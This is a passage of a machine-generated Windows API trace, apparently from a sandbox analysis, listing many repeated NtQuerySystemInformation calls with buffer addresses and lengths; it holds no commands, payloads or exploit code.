ResultLength=0x0) [0273.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x28, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x38, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x20, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x58, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x28, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x28, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc550, Length=0x20, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.524] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x38, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5d0, Length=0x20, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x50, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc890, Length=0x28, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x28, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x28, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.533] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca60, Length=0x38, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x20, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc870, Length=0x20, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.536] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.537] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.541] NtQuerySystemInformation 